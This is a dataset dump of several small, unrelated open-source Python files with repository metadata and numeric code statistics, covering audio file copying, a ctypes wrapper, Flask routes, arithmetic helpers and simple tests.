jagadeesh6jaga/indicAsr--inference
|
569f867ed2d72cbd225f83d9b004666cf5c76c35
|
[
"MIT"
] | 2
|
2022-01-27T22:58:04.000Z
|
2022-02-22T09:53:50.000Z
|
basepath = "<path to dataset>"


def _copy_split(scp_relpath, dest_relpath):
    """Copy every .flac named in a Kaldi wav.scp into the destination dir.

    scp_relpath/dest_relpath are joined onto ``basepath``; the first
    whitespace-separated token of each wav.scp line is the utterance name,
    which is also the .flac filename under <basepath>/audio/.
    """
    with open(basepath + scp_relpath) as f:
        lines = f.read().strip().split('\n')
    for line in tqdm.tqdm(lines):
        name = line.strip().split(' ')[0]
        shutil.copy(
            basepath + "/audio/" + name + ".flac",
            basepath + dest_relpath + name + ".flac",
        )


# Train and dev splits were previously two verbatim-duplicated loops;
# factored into the single helper above.
_copy_split("/**/train_bg/wav.scp", "/**/train_wav/")
_copy_split("/**/dev_bg/wav.scp", "/**/valid_wav/")
| 34.277778
| 88
| 0.585089
| 88
| 617
| 4.034091
| 0.340909
| 0.169014
| 0.146479
| 0.202817
| 0.738028
| 0.738028
| 0.738028
| 0.738028
| 0.738028
| 0.738028
| 0
| 0.003817
| 0.150729
| 617
| 17
| 89
| 36.294118
| 0.673664
| 0.118314
| 0
| 0.545455
| 0
| 0
| 0.22905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b914ef66c8e65bcb22798182d7cf066e49fec617
| 147
|
py
|
Python
|
sandbox/benchmarking_wrappers/sum_of_squares_ctypes.py
|
IgnitionProject/ignition
|
0eeb3a7878d828bc3c06d2cb2dd781e17776a8a6
|
[
"BSD-2-Clause-FreeBSD"
] | 7
|
2015-01-25T18:15:48.000Z
|
2022-03-09T17:39:12.000Z
|
sandbox/benchmarking_wrappers/sum_of_squares_ctypes.py
|
IgnitionProject/ignition
|
0eeb3a7878d828bc3c06d2cb2dd781e17776a8a6
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
sandbox/benchmarking_wrappers/sum_of_squares_ctypes.py
|
IgnitionProject/ignition
|
0eeb3a7878d828bc3c06d2cb2dd781e17776a8a6
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from ctypes import cdll
sum_lib = cdll.LoadLibrary('./libsum_of_squares.so')
def sum_of_squares_ctypes(N):
    """Delegate the sum-of-squares computation to the native shared library."""
    result = sum_lib.sum_of_squares(N)
    return result
| 18.375
| 52
| 0.77551
| 25
| 147
| 4.2
| 0.56
| 0.257143
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 147
| 7
| 53
| 21
| 0.813953
| 0
| 0
| 0
| 0
| 0
| 0.150685
| 0.150685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
b932c3683277208ee21db96d2e84097cd70ffa68
| 25
|
py
|
Python
|
Lib/test/test_compiler/testcorpus/22_func_arg.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 1,886
|
2021-05-03T23:58:43.000Z
|
2022-03-31T19:15:58.000Z
|
Lib/test/test_compiler/testcorpus/22_func_arg.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 70
|
2021-05-04T23:25:35.000Z
|
2022-03-31T18:42:08.000Z
|
Lib/test/test_compiler/testcorpus/22_func_arg.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 52
|
2021-05-04T21:26:03.000Z
|
2022-03-08T18:02:56.000Z
|
def foo(a, b):
    # Expression statement whose result is discarded — presumably intentional:
    # this file lives in a compiler test corpus exercising argument use in a
    # binary operation. TODO confirm comments don't affect corpus expectations.
    a + b
| 8.333333
| 14
| 0.4
| 6
| 25
| 1.666667
| 0.666667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 25
| 2
| 15
| 12.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9583727eec60b90342a78a767f36b5df33c0c86
| 272
|
py
|
Python
|
app/quiz/views.py
|
gibran-abdillah/quiz-app
|
6a346c87c5cc258aa42f8805f226b1119fbf60e6
|
[
"Apache-2.0"
] | 10
|
2021-12-24T09:02:00.000Z
|
2022-02-08T06:54:45.000Z
|
app/quiz/views.py
|
gibran-abdillah/quiz-app
|
6a346c87c5cc258aa42f8805f226b1119fbf60e6
|
[
"Apache-2.0"
] | null | null | null |
app/quiz/views.py
|
gibran-abdillah/quiz-app
|
6a346c87c5cc258aa42f8805f226b1119fbf60e6
|
[
"Apache-2.0"
] | null | null | null |
from app.quiz import quiz_blueprint as quiz
from flask import render_template
@quiz.route('/start/<code>')
def quiz_homepage(code):
    """Render the quiz page for the room identified by *code*."""
    # NOTE(review): *code* is captured from the URL but not passed to the
    # template here — confirm whether the template needs it.
    return render_template('quiz/index.html')
@quiz.route('/')
def index_quiz():
    """Serve the quiz landing page."""
    template = 'quiz/landing-page.html'
    return render_template(template)
| 27.2
| 52
| 0.738971
| 39
| 272
| 5
| 0.487179
| 0.215385
| 0.276923
| 0.246154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 272
| 10
| 52
| 27.2
| 0.819328
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 0.080586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0.125
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b976d363e4ce0189862218855d9115bcdd429b89
| 179
|
py
|
Python
|
flambe/cluster/__init__.py
|
ethan-asapp/flambe
|
70257167058c7b82ee39f74167a6161bd264ad18
|
[
"MIT"
] | 148
|
2019-08-29T21:19:03.000Z
|
2022-03-18T06:13:53.000Z
|
flambe/cluster/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 108
|
2019-09-03T14:36:10.000Z
|
2020-05-13T15:53:14.000Z
|
flambe/cluster/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 21
|
2019-09-08T14:09:45.000Z
|
2020-12-27T04:12:33.000Z
|
from flambe.cluster.cluster import Cluster
from flambe.cluster.aws import AWSCluster
from flambe.cluster.ssh import SSHCluster
__all__ = ['Cluster', 'AWSCluster', 'SSHCluster']
| 25.571429
| 49
| 0.798883
| 22
| 179
| 6.318182
| 0.409091
| 0.215827
| 0.366906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106145
| 179
| 6
| 50
| 29.833333
| 0.86875
| 0
| 0
| 0
| 0
| 0
| 0.150838
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b978c22bc009180503eb2e1d794aa5e91adb680b
| 355
|
py
|
Python
|
Aula 10/Aula10.py
|
Katakhan/TrabalhosPython2
|
ab47af0ff3c00922857578e58a1a149d9e65e229
|
[
"MIT"
] | null | null | null |
Aula 10/Aula10.py
|
Katakhan/TrabalhosPython2
|
ab47af0ff3c00922857578e58a1a149d9e65e229
|
[
"MIT"
] | null | null | null |
Aula 10/Aula10.py
|
Katakhan/TrabalhosPython2
|
ab47af0ff3c00922857578e58a1a149d9e65e229
|
[
"MIT"
] | null | null | null |
def cadicao(n1, n2):
    """Return the sum of the two operands."""
    soma = n1 + n2
    return soma
def csubtracao(n1, n2):
    """Return n1 minus n2."""
    diferenca = n1 - n2
    return diferenca
def cdivisao(n1, n2):
    """Return the true (float) division n1 / n2."""
    quociente = n1 / n2
    return quociente
def cdivisaoint(n1, n2):
    """Return the floor division n1 // n2."""
    quociente = n1 // n2
    return quociente
def cmultiplicacao(n1, n2):
    """Return the product of the two operands."""
    produto = n1 * n2
    return produto
def cpotenciacao(n1, n2):
    """Return n1 raised to the power n2."""
    potencia = n1 ** n2
    return potencia
def craiz(n1, n2):
    """Return the n2-th root of n1, computed as n1 ** (1/n2)."""
    expoente = 1 / n2
    return n1 ** expoente
def cresto(n1, n2):
    """Return the remainder of n1 divided by n2."""
    resto = n1 % n2
    return resto
| 14.2
| 27
| 0.591549
| 57
| 355
| 3.684211
| 0.22807
| 0.285714
| 0.380952
| 0.457143
| 0.552381
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 0.128906
| 0.278873
| 355
| 24
| 28
| 14.791667
| 0.691406
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b993811f4653d9f60636fd1212316c604f2fcae0
| 230
|
py
|
Python
|
tests/sneks/test_normal_snek.py
|
ARMcK-hub/template-python
|
c5e8c48fc92dde522f91227189a3d4822c86d170
|
[
"MIT"
] | null | null | null |
tests/sneks/test_normal_snek.py
|
ARMcK-hub/template-python
|
c5e8c48fc92dde522f91227189a3d4822c86d170
|
[
"MIT"
] | 2
|
2022-02-24T02:58:57.000Z
|
2022-02-24T02:59:15.000Z
|
tests/sneks/test_normal_snek.py
|
ARMcK-hub/template-pyspark
|
d5ba2e0175cab449b2a3b345b2be8978a7d238a3
|
[
"MIT"
] | null | null | null |
from snek_case.sneks import NormalSnek
def test_can_create() -> None:
    """Constructing a NormalSnek with no arguments must not raise."""
    # Assemble / Act / Assert
    NormalSnek()
def test_type_is_normal() -> None:
    """NormalSnek advertises the 'normal' snek_type class attribute."""
    # Assemble / Act / Assert
    expected = "normal"
    assert NormalSnek.snek_type == expected
| 19.166667
| 43
| 0.682609
| 29
| 230
| 5.172414
| 0.586207
| 0.173333
| 0.226667
| 0.28
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.213043
| 230
| 11
| 44
| 20.909091
| 0.828729
| 0.204348
| 0
| 0
| 0
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
b99a36e91679322574a52540e845a56c6daafb97
| 365
|
py
|
Python
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListResponse.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 14
|
2020-12-19T15:06:13.000Z
|
2022-01-12T19:52:17.000Z
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListResponse.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 43
|
2021-01-06T22:05:22.000Z
|
2022-03-10T10:30:30.000Z
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListResponse.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 4
|
2020-12-18T23:10:09.000Z
|
2021-04-02T13:03:12.000Z
|
from typing import List
from infrastructure.cqrs.decorators.responseclass import responseclass
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListDto import GetDataOperationJobExecutionLogListDto
@responseclass
class GetDataOperationJobExecutionLogListResponse:
    """CQRS response wrapper for the job-execution-log list query."""
    # List of log DTOs; None until the query handler assigns the result.
    Data: List[GetDataOperationJobExecutionLogListDto] = None
| 40.555556
| 142
| 0.906849
| 25
| 365
| 13.24
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060274
| 365
| 8
| 143
| 45.625
| 0.965015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.833333
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b9a506d6f526c62204062cfa1e0bf5c6f05f4d6f
| 34
|
py
|
Python
|
database_app.py
|
kneeraazon01/SqlitePython
|
decf049bd75ecc44f5343837db2cef0d552048c2
|
[
"Apache-2.0"
] | null | null | null |
database_app.py
|
kneeraazon01/SqlitePython
|
decf049bd75ecc44f5343837db2cef0d552048c2
|
[
"Apache-2.0"
] | null | null | null |
database_app.py
|
kneeraazon01/SqlitePython
|
decf049bd75ecc44f5343837db2cef0d552048c2
|
[
"Apache-2.0"
] | null | null | null |
# Minimal driver script: delegate to the our_db helper module.
import our_db
# Print every record currently stored in the database table.
our_db.show_all()
| 6.8
| 17
| 0.764706
| 7
| 34
| 3.285714
| 0.714286
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 34
| 5
| 17
| 6.8
| 0.793103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.